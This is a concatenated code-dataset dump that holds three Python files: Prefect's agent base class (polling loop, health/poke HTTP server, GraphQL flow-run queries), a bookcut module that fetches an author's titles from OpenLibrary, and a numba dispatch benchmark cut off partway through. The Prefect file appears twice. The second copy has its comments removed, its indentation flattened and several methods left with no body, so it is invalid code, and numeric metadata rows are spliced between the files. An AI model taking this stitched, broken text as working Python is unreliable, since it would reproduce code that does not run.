                        self.heartbeat()
                        # Backoff: found work resets the interval index, an
                        # empty poll steps one interval further (capped).
                        if self.agent_process(executor):
                            index = 0
                        elif index < max(loop_intervals.keys()):
                            index += 1
                        remaining_polls -= 1
                        self.logger.debug(
                            "Next query for flow runs in {} seconds".format(
                                loop_intervals[index]
                            )
                        )
                        # Wait for loop interval timeout or agent to be poked by
                        # external process before querying for flow runs again.
                        AGENT_WAKE_EVENT.wait(timeout=loop_intervals[index])
        finally:
            self.cleanup()
    def setup(self) -> None:
        """
        Connect to the Prefect API and, if `agent_address` is configured,
        start the internal HTTP API server (health/poke endpoints) in a
        daemon thread.
        Raises:
            - ValueError: if `agent_address` does not include a port
        """
        self.agent_connect()
        if self.agent_address:
            parsed = urlparse(self.agent_address)
            if not parsed.port:
                raise ValueError("Must specify port in agent address")
            port = cast(int, parsed.port)
            hostname = parsed.hostname or ""
            app = web.Application(
                [("/api/health", HealthHandler), ("/api/poke", PokeHandler)]
            )
            def run() -> None:
                # Runs in the api-server thread: start listening and spin the
                # tornado IOLoop until cleanup() stops it.
                self.logger.debug(
                    f"Agent API server listening on port {self.agent_address}"
                )
                self._api_server = app.listen(port, address=hostname) # type: ignore
                self._api_server_loop = IOLoop.current()
                self._api_server_loop.start() # type: ignore
            self._api_server_thread = threading.Thread(
                name="api-server", target=run, daemon=True
            )
            self._api_server_thread.start()
    def cleanup(self) -> None:
        """
        Run the shutdown hook and tear down the internal API server, its
        IOLoop and thread, if they were started by setup().
        """
        self.on_shutdown()
        if self._api_server is not None:
            self.logger.debug("Stopping agent API server")
            self._api_server.stop()
        if self._api_server_loop is not None:
            self.logger.debug("Stopping agent API server loop")
            def stop_server() -> None:
                # Scheduled onto the server's own IOLoop; stopping is
                # best-effort during shutdown.
                try:
                    loop = cast(IOLoop, self._api_server_loop)
                    loop.stop()
                except Exception:
                    pass
            self._api_server_loop.add_callback(stop_server)
        if self._api_server_thread is not None:
            self.logger.debug("Joining agent API threads")
            # Give the server a small period to shutdown nicely, otherwise it
            # will terminate on exit anyway since it's a daemon thread.
            self._api_server_thread.join(timeout=1)
    def on_shutdown(self) -> None:
        """
        Invoked when the event loop is exiting and the agent is shutting down. Intended
        as a hook for child classes to optionally implement.
        """
    def agent_connect(self) -> None:
        """
        Verify agent connection to Prefect API by querying
        """
        print(ascii_name)
        self.logger.info(
            "Starting {} with labels {}".format(type(self).__name__, self.labels)
        )
        self.logger.info(
            "Agent documentation can be found at https://docs.prefect.io/orchestration/"
        )
        self.logger.info(
            "Agent connecting to the Prefect API at {}".format(config.cloud.api)
        )
        try:
            self.client.graphql(query="query { hello }")
        except Exception as exc:
            # Connection failure is logged but not fatal; the poll loop will
            # keep retrying.
            self.logger.error(
                "There was an error connecting to {}".format(config.cloud.api)
            )
            self.logger.error(exc)
        self.logger.info("Waiting for flow runs...")
    def deploy_and_update_flow_run(self, flow_run: "GraphQLResult") -> None:
        """
        Deploy a flow run and update Cloud with the resulting deployment info.
        If any errors occur when submitting the flow run, capture the error and log to Cloud.
        Args:
            - flow_run (GraphQLResult): The specific flow run to deploy
        """
        # Deploy flow run and mark failed if any deployment error
        try:
            self.update_state(flow_run)
            deployment_info = self.deploy_flow(flow_run)
            if getattr(flow_run, "id", None):
                self.client.write_run_logs(
                    [
                        dict(
                            flow_run_id=getattr(flow_run, "id"), # type: ignore
                            name=self.name,
                            message="Submitted for execution: {}".format(
                                deployment_info
                            ),
                            level="INFO",
                        )
                    ]
                )
        except Exception as exc:
            # if the state update failed, we don't want to follow up with another state update
            if "State update failed" in str(exc):
                self.logger.debug("Updating Flow Run state failed: {}".format(str(exc)))
                return
            self.logger.error(
                "Logging platform error for flow run {}".format(
                    getattr(flow_run, "id", "UNKNOWN") # type: ignore
                )
            )
            if getattr(flow_run, "id", None):
                self.client.write_run_logs(
                    [
                        dict(
                            flow_run_id=getattr(flow_run, "id"), # type: ignore
                            name=self.name,
                            message=str(exc),
                            level="ERROR",
                        )
                    ]
                )
            self.mark_failed(flow_run=flow_run, exc=exc)
    def on_flow_run_deploy_attempt(self, fut: "Future", flow_run_id: str) -> None:
        """
        Indicates that a flow run deployment has been deployed (successfully or otherwise).
        This is intended to be a future callback hook, called in the agent's main thread
        when the background thread has completed the deploy_and_update_flow_run() call, either
        successfully, in error, or cancelled. In all cases the agent should be open to
        attempting to deploy the flow run if the flow run id is still in the Cloud run queue.
        Args:
            - fut (Future): a callback requirement, the future which has completed or been
                cancelled.
            - flow_run_id (str): the id of the flow run that the future represents.
        """
        self.submitting_flow_runs.remove(flow_run_id)
        self.logger.debug("Completed flow run submission (id: {})".format(flow_run_id))
    def agent_process(self, executor: "ThreadPoolExecutor") -> bool:
        """
        Full process for finding flow runs, updating states, and deploying.
        Args:
            - executor (ThreadPoolExecutor): the interface to submit flow deployments in
                background threads
        Returns:
            - bool: whether or not flow runs were found
        """
        flow_runs = None
        try:
            flow_runs = self.query_flow_runs()
            if flow_runs:
                self.logger.info(
                    "Found {} flow run(s) to submit for execution.".format(
                        len(flow_runs)
                    )
                )
            for flow_run in flow_runs:
                fut = executor.submit(self.deploy_and_update_flow_run, flow_run)
                self.submitting_flow_runs.add(flow_run.id)
                fut.add_done_callback(
                    functools.partial(
                        self.on_flow_run_deploy_attempt, flow_run_id=flow_run.id
                    )
                )
        except Exception as exc:
            self.logger.error(exc)
        return bool(flow_runs)
    def query_flow_runs(self) -> list:
        """
        Query Prefect Cloud for flow runs which need to be deployed and executed
        Returns:
            - list: A list of GraphQLResult flow run objects
        """
        self.logger.debug("Querying for flow runs")
        # keep a copy of what was curringly running before the query (future callbacks may be
        # updating this set)
        currently_submitting_flow_runs = self.submitting_flow_runs.copy()
        # Get scheduled flow runs from queue
        mutation = {
            "mutation($input: get_runs_in_queue_input!)": {
                "get_runs_in_queue(input: $input)": {"flow_run_ids"}
            }
        }
        now = pendulum.now("UTC")
        result = self.client.graphql(
            mutation,
            variables={
                "input": {
                    "before": now.isoformat(),
                    "labels": list(self.labels),
                    "tenant_id": self.client._active_tenant_id,
                }
            },
        )
        # we queried all of the available flow runs, however, some may have already been pulled
        # by this agent and are in the process of being submitted in the background. We do not
        # want to act on these "duplicate" flow runs until we've been assured that the background
        # thread has attempted to submit the work (successful or otherwise).
        flow_run_ids = set(result.data.get_runs_in_queue.flow_run_ids) # type: ignore
        if flow_run_ids:
            msg = "Found flow runs {}".format(
                result.data.get_runs_in_queue.flow_run_ids
            )
        else:
            msg = "No flow runs found"
        already_submitting = flow_run_ids & currently_submitting_flow_runs
        target_flow_run_ids = flow_run_ids - already_submitting
        if already_submitting:
            msg += " ({} already submitting: {})".format(
                len(already_submitting), list(already_submitting)
            )
        self.logger.debug(msg)
        # Query metadata for flow runs found in queue
        query = {
            "query": {
                with_args(
                    "flow_run",
                    {
                        # match flow runs in the flow_run_ids list
                        "where": {
                            "id": {"_in": list(target_flow_run_ids)},
                            "_or": [
                                # who are EITHER scheduled...
                                {"state": {"_eq": "Scheduled"}},
                                # OR running with task runs scheduled to start more than 3
                                # seconds ago
                                {
                                    "state": {"_eq": "Running"},
                                    "task_runs": {
                                        "state_start_time": {
                                            "_lte": str(now.subtract(seconds=3)) # type: ignore
                                        }
                                    },
                                },
                            ],
                        }
                    },
                ): {
                    "id": True,
                    "version": True,
                    "state": True,
                    "serialized_state": True,
                    "parameters": True,
                    "flow": {
                        "id",
                        "name",
                        "environment",
                        "storage",
                        "version",
                        "core_version",
                    },
                    with_args(
                        "task_runs",
                        {
                            "where": {
                                "state_start_time": {
                                    "_lte": str(now.subtract(seconds=3)) # type: ignore
                                }
                            }
                        },
                    ): {"id", "version", "task_id", "serialized_state"},
                }
            }
        }
        if target_flow_run_ids:
            self.logger.debug("Querying flow run metadata")
            result = self.client.graphql(query)
            return result.data.flow_run # type: ignore
        else:
            return []
    def update_state(self, flow_run: GraphQLResult) -> None:
        """
        After a flow run is grabbed this function sets the state to Submitted so it
        won't be picked up by any other processes
        Args:
            - flow_run (GraphQLResult): A GraphQLResult flow run object
        """
        self.logger.debug(
            "Updating states for flow run {}".format(flow_run.id) # type: ignore
        )
        # Set flow run state to `Submitted` if it is currently `Scheduled`
        if state.StateSchema().load(flow_run.serialized_state).is_scheduled():
            self.logger.debug(
                "Flow run {} is in a Scheduled state, updating to Submitted".format(
                    flow_run.id # type: ignore
                )
            )
            self.client.set_flow_run_state(
                flow_run_id=flow_run.id,
                version=flow_run.version,
                state=Submitted(
                    message="Submitted for execution",
                    state=state.StateSchema().load(flow_run.serialized_state),
                ),
            )
        # Set task run states to `Submitted` if they are currently `Scheduled`
        for task_run in flow_run.task_runs:
            if state.StateSchema().load(task_run.serialized_state).is_scheduled():
                self.logger.debug(
                    "Task run {} is in a Scheduled state, updating to Submitted".format(
                        task_run.id # type: ignore
                    )
                )
                self.client.set_task_run_state(
                    task_run_id=task_run.id,
                    version=task_run.version,
                    state=Submitted(
                        message="Submitted for execution.",
                        state=state.StateSchema().load(task_run.serialized_state),
                    ),
                )
    def mark_failed(self, flow_run: GraphQLResult, exc: Exception) -> None:
        """
        Mark a flow run as `Failed`
        Args:
            - flow_run (GraphQLResult): A GraphQLResult flow run object
            - exc (Exception): An exception that was raised to use as the `Failed`
                message
        """
        self.client.set_flow_run_state(
            flow_run_id=flow_run.id,
            version=flow_run.version,
            state=Failed(message=str(exc)),
        )
        self.logger.error("Error while deploying flow: {}".format(repr(exc)))
    def deploy_flow(self, flow_run: GraphQLResult) -> str:
        """
        Meant to be overridden by a platform specific deployment option
        Args:
            - flow_run (GraphQLResult): A GraphQLResult flow run object
        Returns:
            - str: Information about the deployment
        Raises:
            - ValueError: if deployment attempted on unsupported Storage type
        """
        raise NotImplementedError()
    def heartbeat(self) -> None:
        """
        Meant to be overridden by a platform specific heartbeat option
        """
# Allow `python agent.py` to launch a bare agent directly.
if __name__ == "__main__":
    Agent().start()
| 37.823065 | 97 | 0.544817 | import functools
import logging
import math
import os
import signal
import sys
import threading
import time
from concurrent.futures import Future, ThreadPoolExecutor
from contextlib import contextmanager
from typing import Any, Generator, Iterable, Set, Optional, cast
from urllib.parse import urlparse
import pendulum
from tornado import web
from tornado.ioloop import IOLoop
from prefect import config
from prefect.client import Client
from prefect.engine.state import Failed, Submitted
from prefect.serialization import state
from prefect.utilities.context import context
from prefect.utilities.exceptions import AuthorizationError
from prefect.utilities.graphql import GraphQLResult, with_args
ascii_name = r"""
____ __ _ _ _
| _ \ _ __ ___ / _| ___ ___| |_ / \ __ _ ___ _ __ | |_
| |_) | '__/ _ \ |_ / _ \/ __| __| / _ \ / _` |/ _ \ '_ \| __|
| __/| | | __/ _| __/ (__| |_ / ___ \ (_| | __/ | | | |_
|_| |_| \___|_| \___|\___|\__| /_/ \_\__, |\___|_| |_|\__|
|___/
"""
AGENT_WAKE_EVENT = threading.Event()
@contextmanager
def exit_handler(agent: "Agent") -> Generator:
exit_event = threading.Event()
def _exit_handler(*args: Any, **kwargs: Any) -> None:
agent.logger.info("Keyboard Interrupt received: Agent is shutting down.")
exit_event.set()
AGENT_WAKE_EVENT.set()
original = signal.getsignal(signal.SIGINT)
try:
signal.signal(signal.SIGINT, _exit_handler)
yield exit_event
except SystemExit:
pass
finally:
signal.signal(signal.SIGINT, original)
class HealthHandler(web.RequestHandler):
def get(self) -> None:
self.write({})
class PokeHandler(web.RequestHandler):
def get(self) -> None:
AGENT_WAKE_EVENT.set()
class Agent:
def __init__(
self,
name: str = None,
labels: Iterable[str] = None,
env_vars: dict = None,
max_polls: int = None,
agent_address: str = None,
no_cloud_logs: bool = False,
) -> None:
self.name = name or config.cloud.agent.get("name", "agent")
self.labels = labels or list(config.cloud.agent.get("labels", []))
self.env_vars = env_vars or config.cloud.agent.get("env_vars", dict())
self.max_polls = max_polls
self.log_to_cloud = False if no_cloud_logs else True
self.agent_address = agent_address or config.cloud.agent.get(
"agent_address", ""
)
self._api_server = None
self._api_server_loop = None
self._api_server_thread = None
logger = logging.getLogger(self.name)
logger.setLevel(config.cloud.agent.get("level"))
if not any([isinstance(h, logging.StreamHandler) for h in logger.handlers]):
ch = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(context.config.logging.format)
formatter.converter = time.gmtime
ch.setFormatter(formatter)
logger.addHandler(ch)
self.logger = logger
self.submitting_flow_runs = set()
self.logger.debug("Verbose logs enabled")
self.logger.debug(f"Environment variables: {[*self.env_vars]}")
self.logger.debug(f"Max polls: {self.max_polls}")
self.logger.debug(f"Agent address: {self.agent_address}")
self.logger.debug(f"Log to Cloud: {self.log_to_cloud}")
token = config.cloud.agent.get("auth_token")
self.logger.debug(f"Prefect backend: {config.backend}")
self.client = Client(api_token=token)
def _verify_token(self, token: str) -> None:
if not token:
raise AuthorizationError("No agent API token provided.")
result = self.client.graphql(query="query { auth_info { api_token_scope } }")
if (
not result.data
or result.data.auth_info.api_token_scope != "RUNNER"
):
raise AuthorizationError("Provided token does not have a RUNNER scope.")
def _register_agent(self) -> str:
agent_id = self.client.register_agent(
agent_type=type(self).__name__, name=self.name, labels=self.labels
)
self.logger.debug(f"Agent ID: {agent_id}")
return agent_id
def start(self, _loop_intervals: dict = None) -> None:
if config.backend == "cloud":
self._verify_token(self.client.get_auth_token())
self.client.attach_headers({"X-PREFECT-AGENT-ID": self._register_agent()})
try:
self.setup()
with exit_handler(self) as exit_event:
loop_intervals = _loop_intervals or {
0: 0.25,
1: 0.5,
2: 1.0,
3: 2.0,
4: 4.0,
5: 8.0,
6: 10.0,
}
index = 0
remaining_polls = math.inf if self.max_polls is None else self.max_polls
max_workers = min(32, (os.cpu_count() or 1) + 4)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
self.logger.debug("Max Workers: {}".format(max_workers))
while not exit_event.is_set() and remaining_polls:
AGENT_WAKE_EVENT.clear()
self.heartbeat()
if self.agent_process(executor):
index = 0
elif index < max(loop_intervals.keys()):
index += 1
remaining_polls -= 1
self.logger.debug(
"Next query for flow runs in {} seconds".format(
loop_intervals[index]
)
)
AGENT_WAKE_EVENT.wait(timeout=loop_intervals[index])
finally:
self.cleanup()
def setup(self) -> None:
self.agent_connect()
if self.agent_address:
parsed = urlparse(self.agent_address)
if not parsed.port:
raise ValueError("Must specify port in agent address")
port = cast(int, parsed.port)
hostname = parsed.hostname or ""
app = web.Application(
[("/api/health", HealthHandler), ("/api/poke", PokeHandler)]
)
def run() -> None:
self.logger.debug(
f"Agent API server listening on port {self.agent_address}"
)
self._api_server = app.listen(port, address=hostname)
self._api_server_loop = IOLoop.current()
self._api_server_loop.start()
self._api_server_thread = threading.Thread(
name="api-server", target=run, daemon=True
)
self._api_server_thread.start()
def cleanup(self) -> None:
self.on_shutdown()
if self._api_server is not None:
self.logger.debug("Stopping agent API server")
self._api_server.stop()
if self._api_server_loop is not None:
self.logger.debug("Stopping agent API server loop")
def stop_server() -> None:
try:
loop = cast(IOLoop, self._api_server_loop)
loop.stop()
except Exception:
pass
self._api_server_loop.add_callback(stop_server)
if self._api_server_thread is not None:
self.logger.debug("Joining agent API threads")
self._api_server_thread.join(timeout=1)
def on_shutdown(self) -> None:
def agent_connect(self) -> None:
print(ascii_name)
self.logger.info(
"Starting {} with labels {}".format(type(self).__name__, self.labels)
)
self.logger.info(
"Agent documentation can be found at https://docs.prefect.io/orchestration/"
)
self.logger.info(
"Agent connecting to the Prefect API at {}".format(config.cloud.api)
)
try:
self.client.graphql(query="query { hello }")
except Exception as exc:
self.logger.error(
"There was an error connecting to {}".format(config.cloud.api)
)
self.logger.error(exc)
self.logger.info("Waiting for flow runs...")
def deploy_and_update_flow_run(self, flow_run: "GraphQLResult") -> None:
# Deploy flow run and mark failed if any deployment error
try:
self.update_state(flow_run)
deployment_info = self.deploy_flow(flow_run)
if getattr(flow_run, "id", None):
self.client.write_run_logs(
[
dict(
flow_run_id=getattr(flow_run, "id"), # type: ignore
name=self.name,
message="Submitted for execution: {}".format(
deployment_info
),
level="INFO",
)
]
)
except Exception as exc:
# if the state update failed, we don't want to follow up with another state update
if "State update failed" in str(exc):
self.logger.debug("Updating Flow Run state failed: {}".format(str(exc)))
return
self.logger.error(
"Logging platform error for flow run {}".format(
getattr(flow_run, "id", "UNKNOWN")
)
)
if getattr(flow_run, "id", None):
self.client.write_run_logs(
[
dict(
flow_run_id=getattr(flow_run, "id"),
name=self.name,
message=str(exc),
level="ERROR",
)
]
)
self.mark_failed(flow_run=flow_run, exc=exc)
def on_flow_run_deploy_attempt(self, fut: "Future", flow_run_id: str) -> None:
self.submitting_flow_runs.remove(flow_run_id)
self.logger.debug("Completed flow run submission (id: {})".format(flow_run_id))
def agent_process(self, executor: "ThreadPoolExecutor") -> bool:
flow_runs = None
try:
flow_runs = self.query_flow_runs()
if flow_runs:
self.logger.info(
"Found {} flow run(s) to submit for execution.".format(
len(flow_runs)
)
)
for flow_run in flow_runs:
fut = executor.submit(self.deploy_and_update_flow_run, flow_run)
self.submitting_flow_runs.add(flow_run.id)
fut.add_done_callback(
functools.partial(
self.on_flow_run_deploy_attempt, flow_run_id=flow_run.id
)
)
except Exception as exc:
self.logger.error(exc)
return bool(flow_runs)
def query_flow_runs(self) -> list:
self.logger.debug("Querying for flow runs")
currently_submitting_flow_runs = self.submitting_flow_runs.copy()
mutation = {
"mutation($input: get_runs_in_queue_input!)": {
"get_runs_in_queue(input: $input)": {"flow_run_ids"}
}
}
now = pendulum.now("UTC")
result = self.client.graphql(
mutation,
variables={
"input": {
"before": now.isoformat(),
"labels": list(self.labels),
"tenant_id": self.client._active_tenant_id,
}
},
)
# thread has attempted to submit the work (successful or otherwise).
flow_run_ids = set(result.data.get_runs_in_queue.flow_run_ids) # type: ignore
if flow_run_ids:
msg = "Found flow runs {}".format(
result.data.get_runs_in_queue.flow_run_ids
)
else:
msg = "No flow runs found"
already_submitting = flow_run_ids & currently_submitting_flow_runs
target_flow_run_ids = flow_run_ids - already_submitting
if already_submitting:
msg += " ({} already submitting: {})".format(
len(already_submitting), list(already_submitting)
)
self.logger.debug(msg)
# Query metadata for flow runs found in queue
query = {
"query": {
with_args(
"flow_run",
{
# match flow runs in the flow_run_ids list
"where": {
"id": {"_in": list(target_flow_run_ids)},
"_or": [
# who are EITHER scheduled...
{"state": {"_eq": "Scheduled"}},
# OR running with task runs scheduled to start more than 3
# seconds ago
{
"state": {"_eq": "Running"},
"task_runs": {
"state_start_time": {
"_lte": str(now.subtract(seconds=3)) # type: ignore
}
},
},
],
}
},
): {
"id": True,
"version": True,
"state": True,
"serialized_state": True,
"parameters": True,
"flow": {
"id",
"name",
"environment",
"storage",
"version",
"core_version",
},
with_args(
"task_runs",
{
"where": {
"state_start_time": {
"_lte": str(now.subtract(seconds=3)) # type: ignore
}
}
},
): {"id", "version", "task_id", "serialized_state"},
}
}
}
if target_flow_run_ids:
self.logger.debug("Querying flow run metadata")
result = self.client.graphql(query)
return result.data.flow_run # type: ignore
else:
return []
def update_state(self, flow_run: GraphQLResult) -> None:
self.logger.debug(
"Updating states for flow run {}".format(flow_run.id) # type: ignore
)
# Set flow run state to `Submitted` if it is currently `Scheduled`
if state.StateSchema().load(flow_run.serialized_state).is_scheduled():
self.logger.debug(
"Flow run {} is in a Scheduled state, updating to Submitted".format(
flow_run.id # type: ignore
)
)
self.client.set_flow_run_state(
flow_run_id=flow_run.id,
version=flow_run.version,
state=Submitted(
message="Submitted for execution",
state=state.StateSchema().load(flow_run.serialized_state),
),
)
# Set task run states to `Submitted` if they are currently `Scheduled`
for task_run in flow_run.task_runs:
if state.StateSchema().load(task_run.serialized_state).is_scheduled():
self.logger.debug(
"Task run {} is in a Scheduled state, updating to Submitted".format(
task_run.id # type: ignore
)
)
self.client.set_task_run_state(
task_run_id=task_run.id,
version=task_run.version,
state=Submitted(
message="Submitted for execution.",
state=state.StateSchema().load(task_run.serialized_state),
),
)
def mark_failed(self, flow_run: GraphQLResult, exc: Exception) -> None:
self.client.set_flow_run_state(
flow_run_id=flow_run.id,
version=flow_run.version,
state=Failed(message=str(exc)),
)
self.logger.error("Error while deploying flow: {}".format(repr(exc)))
def deploy_flow(self, flow_run: GraphQLResult) -> str:
raise NotImplementedError()
def heartbeat(self) -> None:
if __name__ == "__main__":
Agent().start()
| true | true |
1c304688836feeccfaa7f34d41a25f173cdb04b9 | 2,543 | py | Python | bookcut/bibliography.py | jonasw234/bookcut | c159e6f9374b55744115545fb96a73ab78255bd5 | [
"MIT"
] | null | null | null | bookcut/bibliography.py | jonasw234/bookcut | c159e6f9374b55744115545fb96a73ab78255bd5 | [
"MIT"
] | null | null | null | bookcut/bibliography.py | jonasw234/bookcut | c159e6f9374b55744115545fb96a73ab78255bd5 | [
"MIT"
] | null | null | null | import requests
import json
import re
from difflib import SequenceMatcher
import os
from bookcut.mirror_checker import pageStatus
'''This file is used by ---allbooks command
It is searching OpenLibrary for all books written from an
author, and gives the choice to user to save it to a .txt file'''
OPEN_LIBRARY_URL = 'http://www.openlibrary.org'
def main(author, similarity):
# returns all the books writen by an author from openlibrary
# using similarity for filtering the results
status = pageStatus(OPEN_LIBRARY_URL)
if status is not False:
search_url = "http://openlibrary.org/search.json?author=" + author
jason = requests.get(search_url)
jason = jason.text
data = json.loads(jason)
data = data['docs']
if data != []:
metr = 0
books = []
for i in range(0, len(data)-1):
title = data[metr]['title']
metr = metr + 1
books.append(title)
mylist = list(dict.fromkeys(books))
# Filtrering results: trying to erase similar titles
words = [' the ', 'The ', ' THE ', ' The' ' a ', ' A ', ' and ',
' of ', ' from ', 'on', 'The', 'in']
noise_re = re.compile('\\b(%s)\\W'%('|'.join(map(re.escape, words))), re.I)
clean_mylist = [noise_re.sub('', p) for p in mylist]
for i in clean_mylist:
for j in clean_mylist:
a = similar(i, j, similarity)
if a is True:
clean_mylist.pop(a)
clean_mylist.sort()
print(' ~Books found to OpenLibrary Database:\n')
for i in clean_mylist:
print(i)
return clean_mylist
else:
print('(!) No valid author name, or bad internet connection.')
print('Please try again!')
return None
def similar(a, b, similarity):
''' function which check similarity between two strings '''
ratio = SequenceMatcher(None, a, b).ratio()
if ratio > similarity and ratio < 1:
return True
else:
return False
def save_to_txt(lista, path, author):
# save the books list to txt file.
for content in lista:
name = f'{author}_bibliography.txt'
full_path = os.path.join(path, name)
with open(full_path, 'a', encoding='utf-8') as f1:
f1.write(content + ' ' + author + os.linesep)
print('\nList saved at: ', full_path, '\n')
| 34.364865 | 87 | 0.564687 | import requests
import json
import re
from difflib import SequenceMatcher
import os
from bookcut.mirror_checker import pageStatus
OPEN_LIBRARY_URL = 'http://www.openlibrary.org'
def main(author, similarity):
status = pageStatus(OPEN_LIBRARY_URL)
if status is not False:
search_url = "http://openlibrary.org/search.json?author=" + author
jason = requests.get(search_url)
jason = jason.text
data = json.loads(jason)
data = data['docs']
if data != []:
metr = 0
books = []
for i in range(0, len(data)-1):
title = data[metr]['title']
metr = metr + 1
books.append(title)
mylist = list(dict.fromkeys(books))
words = [' the ', 'The ', ' THE ', ' The' ' a ', ' A ', ' and ',
' of ', ' from ', 'on', 'The', 'in']
noise_re = re.compile('\\b(%s)\\W'%('|'.join(map(re.escape, words))), re.I)
clean_mylist = [noise_re.sub('', p) for p in mylist]
for i in clean_mylist:
for j in clean_mylist:
a = similar(i, j, similarity)
if a is True:
clean_mylist.pop(a)
clean_mylist.sort()
print(' ~Books found to OpenLibrary Database:\n')
for i in clean_mylist:
print(i)
return clean_mylist
else:
print('(!) No valid author name, or bad internet connection.')
print('Please try again!')
return None
def similar(a, b, similarity):
ratio = SequenceMatcher(None, a, b).ratio()
if ratio > similarity and ratio < 1:
return True
else:
return False
def save_to_txt(lista, path, author):
for content in lista:
name = f'{author}_bibliography.txt'
full_path = os.path.join(path, name)
with open(full_path, 'a', encoding='utf-8') as f1:
f1.write(content + ' ' + author + os.linesep)
print('\nList saved at: ', full_path, '\n')
| true | true |
1c304704a1d512fe8f0aaa81fbdd60ed45dcc10d | 189 | py | Python | main.py | nhnam0209/Automatic-Render-PDF-CV | a2d971a62adfd2cbd8ffbc02c0c7c37c8d9a9908 | [
"CC0-1.0"
] | 1 | 2022-01-15T06:02:08.000Z | 2022-01-15T06:02:08.000Z | main.py | nhnam0209/Automatic-Render-PDF-CV | a2d971a62adfd2cbd8ffbc02c0c7c37c8d9a9908 | [
"CC0-1.0"
] | null | null | null | main.py | nhnam0209/Automatic-Render-PDF-CV | a2d971a62adfd2cbd8ffbc02c0c7c37c8d9a9908 | [
"CC0-1.0"
] | null | null | null | import json
from a_40.a_40 import fill
import time
if __name__ == '__main__':
s = time.time()
with open("cv.json", encoding="utf8") as f:
data = json.load(f)
fill(data)
| 21 | 47 | 0.62963 | import json
from a_40.a_40 import fill
import time
if __name__ == '__main__':
s = time.time()
with open("cv.json", encoding="utf8") as f:
data = json.load(f)
fill(data)
| true | true |
1c3047312aa578da327c332ab9e4e7611547e93b | 1,561 | py | Python | uvclite/test.py | worldcom-exchange/uvclite | 5fac35153faa42c712ab0f8488f6b343d3c3469e | [
"Apache-2.0"
] | 5 | 2018-04-11T08:32:55.000Z | 2021-11-26T13:56:39.000Z | uvclite/test.py | worldcom-exchange/uvclite | 5fac35153faa42c712ab0f8488f6b343d3c3469e | [
"Apache-2.0"
] | null | null | null | uvclite/test.py | worldcom-exchange/uvclite | 5fac35153faa42c712ab0f8488f6b343d3c3469e | [
"Apache-2.0"
] | 5 | 2018-11-13T18:17:18.000Z | 2021-11-26T13:56:41.000Z | #!/usr/bin/python
# Copyright 2017 Eric Callahan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import uvclite
if __name__ == '__main__':
with uvclite.UVCContext() as context:
devlist = context.get_device_list()
#dev = context.find_device()
print(len(devlist))
for dev in devlist:
devdesc = dev.get_device_descriptor()
print("Vendor ID: %d" % devdesc.idVendor)
print("Product ID: %d" % devdesc.idProduct)
print("UVC Standard: %d" % devdesc.bcdUVC)
print("Serial Number: %s" % devdesc.serialNumber)
print("Manufacturer: %s" % devdesc.manufacturer)
print("Product Name %s" % devdesc.product)
dev.free_device_descriptor()
print("Freed descriptor")
devlist = context.get_device_list()
#dev = context.find_device()
print(len(devlist))
for dev in devlist:
dev.open()
dev.print_diagnostics()
dev.close()
| 33.934783 | 74 | 0.649584 |
from __future__ import print_function
import uvclite
if __name__ == '__main__':
with uvclite.UVCContext() as context:
devlist = context.get_device_list()
print(len(devlist))
for dev in devlist:
devdesc = dev.get_device_descriptor()
print("Vendor ID: %d" % devdesc.idVendor)
print("Product ID: %d" % devdesc.idProduct)
print("UVC Standard: %d" % devdesc.bcdUVC)
print("Serial Number: %s" % devdesc.serialNumber)
print("Manufacturer: %s" % devdesc.manufacturer)
print("Product Name %s" % devdesc.product)
dev.free_device_descriptor()
print("Freed descriptor")
devlist = context.get_device_list()
print(len(devlist))
for dev in devlist:
dev.open()
dev.print_diagnostics()
dev.close()
| true | true |
1c304913101c17c5d6a2c699cd1001acac57a3be | 2,195 | py | Python | benchmarks/bench_dispatch.py | abitrolly/numba-benchmark | 4bea9c23276fd0399df26452d19f13810a6496c7 | [
"BSD-2-Clause"
] | 6 | 2015-10-19T09:18:50.000Z | 2021-11-29T10:37:10.000Z | benchmarks/bench_dispatch.py | abitrolly/numba-benchmark | 4bea9c23276fd0399df26452d19f13810a6496c7 | [
"BSD-2-Clause"
] | 9 | 2015-03-03T09:50:56.000Z | 2021-10-13T08:34:06.000Z | benchmarks/bench_dispatch.py | abitrolly/numba-benchmark | 4bea9c23276fd0399df26452d19f13810a6496c7 | [
"BSD-2-Clause"
] | 7 | 2015-09-09T17:38:11.000Z | 2021-09-24T15:06:19.000Z | """
Benchmarks for argument dispatching and call overhead of ``@jit`` functions.
"""
import numpy as np
rec_dtype = np.dtype([('a', np.float64),
('b', np.int32),
('c', np.complex64),
])
samples = {
'bool': True,
'int': 100000,
'float': 0.5,
'complex': 0.5 + 1.0j,
'array_1d': np.zeros(10, dtype=np.int64),
'array_3d': np.zeros(20, dtype=np.float64).reshape(2, 2, 5),
'array_records': np.zeros(10, dtype=rec_dtype),
'recarray': np.recarray(10, dtype=rec_dtype),
'tuple': (0.5, 1.0j, ()),
'record': np.empty(1, dtype=rec_dtype)[0],
'bytearray': bytearray(3),
}
def setup():
"""
Precompile jitted functions. This will register many specializations
to choose from.
"""
from numba import jit
global binary, binary_pyobj, unary_default
@jit(nopython=True)
def binary(x, y):
pass
@jit(forceobj=True)
def binary_pyobj(x, y):
pass
@jit(nopython=True)
def unary_default(x=None):
pass
for tp in samples.values():
binary(tp, tp)
binary_pyobj(object(), object())
unary_default()
class NoPythonDispatch:
"""
Time dispatching to a jitted function's specializations based on argument
types.
This stresses two things:
- the typing of arguments (from argument value to typecode)
- the selection of the best specialization amongst all the known ones
"""
# We repeat 1000 times so as to make the overhead of benchmark launching
# negligible.
@classmethod
def generate_benchmarks(cls, names):
for name in names:
def timefunc(self, arg=samples[name]):
func = binary
for i in range(1000):
func(arg, arg)
timefunc.__name__ = "time_dispatch_" + name
setattr(cls, timefunc.__name__, timefunc)
def time_dispatch_defaults(self):
unary_default()
NoPythonDispatch.generate_benchmarks(samples.keys())
class PyObjectDispatch:
def time_dispatch_pyobject(self):
x = object()
for i in range(1000):
binary_pyobj(x, x)
| 24.120879 | 77 | 0.598633 |
import numpy as np
rec_dtype = np.dtype([('a', np.float64),
('b', np.int32),
('c', np.complex64),
])
samples = {
'bool': True,
'int': 100000,
